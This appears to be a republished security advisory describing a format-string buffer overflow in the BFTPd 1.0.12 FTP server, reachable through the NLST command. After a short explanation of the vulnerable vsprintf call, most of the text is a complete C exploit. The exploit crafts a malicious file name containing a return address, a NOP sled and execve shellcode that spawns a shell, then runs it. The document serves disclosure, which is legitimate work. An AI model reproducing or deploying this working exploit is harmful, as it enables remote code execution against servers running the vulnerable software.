[ SOURCE: http://www.secureroot.com/security/advisories/9761914935.html ]
Malformed vsprintf in BFTPd allows execution of arbitrary code
------------------------------------------------------------------------
SUMMARY
BFTPd is a Linux FTP server with chroot
and setreuid functionality. The latest version of BFTP has a potential
security problem when the NSLT command is requested to list a file that
contains a formatting string. The vulnerability allows remote attackers to
overflow internal buffers, and execute arbitrary code.
DETAILS
Vulnerable systems:
BFTPd 1.0.12
There is a malformed call to vsprintf in BFTPd. The relevant vulnerable
function is sendstrf:
int sendstrf(int s, char *format, ...) {
....
vsprintf(buffer, format, val);
When the function is called from an NLIST command, it is incorrectly
allowed to supply formatting string to the vsprintf:
else
foo = 1;
sendstrf(s, entry->d_name);
}
This can be used to overflow the buffer of the vsprintf and execute
arbitrary code.
Exploit:
/*
Creates a filname to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a
/ in
the filename)
hints by |CyRaX| & Cthulhu
coded by asynchro
www.pkcrew.org
*/
#include
#include
#define BUFSIZE 512
#define NOP 124
main()
{
int i;
char *buff;
char nop=0x90;
char addr[]="\xd4\xf9\xff\xbf";
char command[]="touch %.260x";
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xffsh";
buff=(char *) malloc(BUFSIZE);
memset(buff,0x0,BUFSIZE);
memcpy(buff,command,sizeof(command));
strncat(buff,addr,4);
strncat(buff,addr,4);
for(i=0; i < NOP ;i++)
{
strncat(buff,&nop,1);
}
strncat(buff,shellcode,strlen(shellcode));
system(buff);
}
ADDITIONAL INFORMATION
The information has been provided by
asynchro.